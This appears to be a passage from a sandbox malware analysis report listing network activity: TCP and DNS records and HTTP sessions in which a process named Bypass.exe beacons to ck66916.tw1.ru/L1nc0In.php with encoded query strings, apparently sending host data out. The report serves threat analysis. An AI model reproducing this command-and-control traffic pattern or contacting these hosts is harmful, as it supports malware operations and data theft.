Jun 23, 2024 06:56:44.855379105 CEST	80	49775	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:44.855437994 CEST	49775	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:44.855942965 CEST	80	49776	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:44.856163979 CEST	49776	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:44.856257915 CEST	49776	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:44.861311913 CEST	80	49776	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:44.861459970 CEST	80	49776	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:45.564608097 CEST	80	49776	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:45.618156910 CEST	49776	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:50.568533897 CEST	49776	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:50.569331884 CEST	49777	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:50.574316025 CEST	80	49777	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:50.574335098 CEST	80	49776	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:50.574369907 CEST	49777	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:50.574415922 CEST	49776	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:50.574568987 CEST	49777	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:50.579962015 CEST	80	49777	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:50.579988956 CEST	80	49777	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:51.263937950 CEST	80	49777	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:51.320461035 CEST	49777	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:56.271553993 CEST	49777	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:56.272407055 CEST	49778	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:56.276793003 CEST	80	49777	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:56.276846886 CEST	49777	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:56.277143955 CEST	80	49778	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:56.277200937 CEST	49778	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:56.277299881 CEST	49778	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:56:56.282239914 CEST	80	49778	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:56.282336950 CEST	80	49778	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:56.977318048 CEST	80	49778	92.53.96.121	192.168.2.4
Jun 23, 2024 06:56:57.021131039 CEST	49778	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:01.996309996 CEST	49778	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:01.996315002 CEST	49779	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:02.001656055 CEST	80	49779	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:02.001815081 CEST	80	49778	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:02.002366066 CEST	49779	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:02.002468109 CEST	49778	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:02.002727985 CEST	49779	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:02.007651091 CEST	80	49779	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:02.007724047 CEST	80	49779	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:02.705717087 CEST	80	49779	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:02.755621910 CEST	49779	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:02.943653107 CEST	80	49779	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:02.943840981 CEST	49779	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:07.710182905 CEST	49780	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:07.710196018 CEST	49779	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:07.715095043 CEST	80	49780	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:07.715430975 CEST	80	49779	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:07.715547085 CEST	49779	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:07.715583086 CEST	49780	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:07.715639114 CEST	49780	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:07.720412970 CEST	80	49780	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:07.720577955 CEST	80	49780	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:08.414673090 CEST	80	49780	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:08.458607912 CEST	49780	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:13.428519964 CEST	49780	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:13.428529978 CEST	49781	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:13.433408022 CEST	80	49781	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:13.433648109 CEST	80	49780	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:13.436551094 CEST	49780	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:13.436553001 CEST	49781	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:13.436690092 CEST	49781	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:13.441462994 CEST	80	49781	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:13.441678047 CEST	80	49781	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:14.127618074 CEST	80	49781	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:14.180360079 CEST	49781	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:19.131117105 CEST	49781	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:19.131947994 CEST	49782	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:19.136424065 CEST	80	49781	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:19.136503935 CEST	49781	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:19.136712074 CEST	80	49782	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:19.136790991 CEST	49782	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:19.136914015 CEST	49782	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:19.141688108 CEST	80	49782	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:19.141848087 CEST	80	49782	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:19.835242987 CEST	80	49782	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:19.842199087 CEST	49782	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:19.847347021 CEST	80	49782	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:19.854192972 CEST	49782	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:24.850706100 CEST	49783	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:24.857470036 CEST	80	49783	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:24.857542992 CEST	49783	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:24.857641935 CEST	49783	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:24.862569094 CEST	80	49783	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:24.862581015 CEST	80	49783	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:25.557725906 CEST	80	49783	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:25.599267006 CEST	49783	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:30.569205999 CEST	49783	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:30.569675922 CEST	49784	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:30.574493885 CEST	80	49783	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:30.574538946 CEST	80	49784	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:30.574548006 CEST	49783	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:30.574599981 CEST	49784	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:30.574831009 CEST	49784	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:30.579677105 CEST	80	49784	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:30.579811096 CEST	80	49784	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:31.268132925 CEST	80	49784	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:31.318207026 CEST	49784	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:36.271720886 CEST	49784	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:36.272878885 CEST	49785	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:36.277013063 CEST	80	49784	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:36.277069092 CEST	49784	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:36.277728081 CEST	80	49785	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:36.277936935 CEST	49785	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:36.277936935 CEST	49785	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:36.282892942 CEST	80	49785	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:36.283199072 CEST	80	49785	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:37.000525951 CEST	80	49785	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:37.052491903 CEST	49785	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:42.006794930 CEST	49785	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:42.006794930 CEST	49786	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:42.012186050 CEST	80	49786	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:42.012403965 CEST	80	49785	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:42.012608051 CEST	49785	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:42.012608051 CEST	49786	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:42.012749910 CEST	49786	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:42.017668962 CEST	80	49786	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:42.017714977 CEST	80	49786	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:42.723964930 CEST	80	49786	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:42.771337032 CEST	49786	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:47.741519928 CEST	49787	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:47.741611004 CEST	49786	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:47.746722937 CEST	80	49787	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:47.746747017 CEST	80	49786	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:47.746824980 CEST	49787	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:47.746974945 CEST	49786	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:47.747111082 CEST	49787	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:47.751920938 CEST	80	49787	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:47.752223969 CEST	80	49787	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:48.455339909 CEST	80	49787	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:48.505557060 CEST	49787	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:53.465369940 CEST	49787	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:53.471139908 CEST	80	49787	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:53.471323967 CEST	49788	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:53.476253986 CEST	80	49788	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:53.476332903 CEST	49787	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:53.480514050 CEST	49788	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:53.480514050 CEST	49788	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:53.485631943 CEST	80	49788	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:53.485894918 CEST	80	49788	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:54.204020977 CEST	80	49788	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:54.257292986 CEST	49788	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:59.209139109 CEST	49788	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:59.210114956 CEST	49789	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:59.214467049 CEST	80	49788	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:59.214534998 CEST	49788	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:59.214862108 CEST	80	49789	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:59.214992046 CEST	49789	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:59.215189934 CEST	49789	80	192.168.2.4	92.53.96.121
Jun 23, 2024 06:57:59.219930887 CEST	80	49789	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:59.220078945 CEST	80	49789	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:59.939810038 CEST	80	49789	92.53.96.121	192.168.2.4
Jun 23, 2024 06:57:59.990437984 CEST	49789	80	192.168.2.4	92.53.96.121

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 23, 2024 06:54:14.556972980 CEST	56703	53	192.168.2.4	1.1.1.1
Jun 23, 2024 06:54:14.569299936 CEST	53	56703	1.1.1.1	192.168.2.4
Jun 23, 2024 06:54:19.153496027 CEST	49841	53	192.168.2.4	1.1.1.1
Jun 23, 2024 06:54:19.206234932 CEST	53	49841	1.1.1.1	192.168.2.4
Jun 23, 2024 06:54:20.099349976 CEST	61711	53	192.168.2.4	1.1.1.1
Jun 23, 2024 06:54:20.106935024 CEST	53	61711	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 23, 2024 06:54:14.556972980 CEST	192.168.2.4	1.1.1.1	0x4803	Standard query (0)	backcreammykiel.shop	A (IP address)	IN (0x0001)	false
Jun 23, 2024 06:54:19.153496027 CEST	192.168.2.4	1.1.1.1	0xebe6	Standard query (0)	ck66916.tw1.ru	A (IP address)	IN (0x0001)	false
Jun 23, 2024 06:54:20.099349976 CEST	192.168.2.4	1.1.1.1	0xfcb9	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jun 23, 2024 06:54:14.569299936 CEST	1.1.1.1	192.168.2.4	0x4803	No error (0)	backcreammykiel.shop	104.21.90.18	A (IP address)	IN (0x0001)	false
Jun 23, 2024 06:54:14.569299936 CEST	1.1.1.1	192.168.2.4	0x4803	No error (0)	backcreammykiel.shop	172.67.151.5	A (IP address)	IN (0x0001)	false
Jun 23, 2024 06:54:19.206234932 CEST	1.1.1.1	192.168.2.4	0xebe6	No error (0)	ck66916.tw1.ru	92.53.96.121	A (IP address)	IN (0x0001)	false
Jun 23, 2024 06:54:20.106935024 CEST	1.1.1.1	192.168.2.4	0xfcb9	No error (0)	ipinfo.io	34.117.186.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

backcreammykiel.shop

ck66916.tw1.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:19.222657919 CEST	415	OUT	GET /L1nc0In.php?iUu=8R7Isg&ee5ae8efe50125d60098b1ca132932bc=49479fbd79a245ee458d40f1dd85aa54&650a0c21718513cd4feada722441e9dc=gMjRGOkJjYmNWNxMmYiZzMiVTN1UmNhBzNzMTZldTY4kTYxUWNwQmN&iUu=8R7Isg HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:54:20.024810076 CEST	603	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 440 Connection: keep-alive Data Raw: 39 4a 53 59 6c 68 44 4f 30 67 6a 5a 68 68 7a 59 78 4d 6a 4d 6d 4a 6a 59 6c 52 6d 59 79 51 6a 4d 6c 68 44 4d 77 6b 6a 59 35 51 7a 4d 68 4a 69 4f 69 55 44 4e 30 67 44 4d 68 56 32 4d 6c 64 6a 4d 34 59 57 4d 69 5a 57 4e 77 55 7a 4e 6d 5a 57 59 69 46 7a 4e 34 51 32 4e 6d 4a 57 4d 69 77 69 49 69 6f 6a 49 32 4d 6d 5a 77 49 6a 4e 79 67 54 59 31 59 7a 4d 35 49 47 4e 69 46 47 4f 30 67 44 4e 78 51 54 4f 32 4d 44 5a 6b 6c 54 5a 77 45 6d 49 73 49 69 54 58 31 6b 4d 4e 64 55 4e 6f 4a 32 52 4b 78 6d 59 79 49 31 63 68 64 56 55 39 49 69 4f 69 4d 57 4e 6a 46 57 5a 35 67 7a 4e 79 55 6d 4e 35 49 6a 4d 77 49 57 4f 35 51 44 5a 6c 56 32 59 6c 56 7a 59 35 45 6a 4e 6c 5a 44 5a 69 77 69 49 30 51 7a 59 78 45 57 5a 30 4d 7a 59 33 41 6a 4e 6d 68 44 4d 6c 4e 6d 4e 35 6b 44 5a 30 41 7a 4d 79 6b 6a 59 77 59 54 4e 32 49 6d 49 36 49 69 59 35 59 54 4f 6a 4a 7a 4e 35 55 6a 4d 6a 46 47 4d 6d 4a 57 4d 31 59 57 4f 79 55 7a 59 6b 56 54 59 33 41 54 4f 32 59 54 4e 79 49 43 4c 69 49 32 4d 79 59 6d 4d 6d 4a 32 59 6a 42 7a 59 34 4d 7a 59 78 51 [TRUNCATED] Data Ascii: 9JSYlhDO0gjZhhzYxMjMmJjYlRmYyQjMlhDMwkjY5QzMhJiOiUDN0gDMhV2MldjM4YWMiZWNwUzNmZWYiFzN4Q2NmJWMiwiIiojI2MmZwIjNygTY1YzM5IGNiFGO0gDNxQTO2MDZklTZwEmIsIiTX1kMNdUNoJ2RKxmYyI1chdVU9IiOiMWNjFWZ5gzNyUmN5IjMwIWO5QDZlV2YlVzY5EjNlZDZiwiI0QzYxEWZ0MzY3AjNmhDMlNmN5kDZ0AzMykjYwYTN2ImI6IiY5YTOjJzN5UjMjFGMmJWM1YWOyUzYkVTY3ATO2YTNyICLiI2MyYmMmJ2YjBzY4MzYxQzNwQWO2UTNjRjZkFDOjhzNiFWMjRmZhJzNxMTMzEzM2cTM2kTO0IjI6IiNlFGMyQmZxIDMhRDM3EDZzEDZ2AzYlFzMiRDNjZWO4Iye
Jun 23, 2024 06:54:20.069186926 CEST	758	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:54:20.290112019 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 23, 2024 06:54:20.290936947 CEST	826	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTntGVNZTUU5kNBRUTnFlaNdXS6xkMBpHT6lkeXJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:54:20.339663029 CEST	758	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIhFWN4YzY5IjZyIWZ5gTZycjY3EDOyYzYwAzN0YmM5MmZwcTZhNWY3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:54:20.514467001 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 23, 2024 06:54:20.645796061 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 23, 2024 06:54:20.646226883 CEST	2803	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=d1nIRZWa0IjYwJFWklGbtNGMOhVYFZVbjhGZIRWb5ITVjhnVZBjRHJFdG12YulTbjFFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJhmWqlFaxMUT0klaOJTUE1Ua05GT5IERNdXQE10dBRUT1VkaMdHND10NKl2Tp1EWaVXOHF2d502Yqx2VUl2dplUavpWS6FzVZpmSXpFWKNETpRzRYlHeW1kWGVEVR5kVTVEeGhVd3ZEWjhHbJZTS5NWdWdlW55kMVl2dplUdkNjY1RXbiZlSp9UaBZ1UPZURUl2dpl0QkVUSwkUaPlGMVF1UKNETpRjMkZXNyEWdWxWS2k0QiNnRyQGbKhVYHp0QMlWSYp1a1clWtZ1RSdWTzQmdS1mYwRGbJZTS5NWMKhVYyw2RkVnRrl0cJlWUIpVRXJTSp9Ua0IjYw5kbjxmWxUFUstWUpdXaJlXUE9EeFpWT4VkaNlHND5kM [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:54:20.868113995 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49745	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:20.318283081 CEST	2197	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
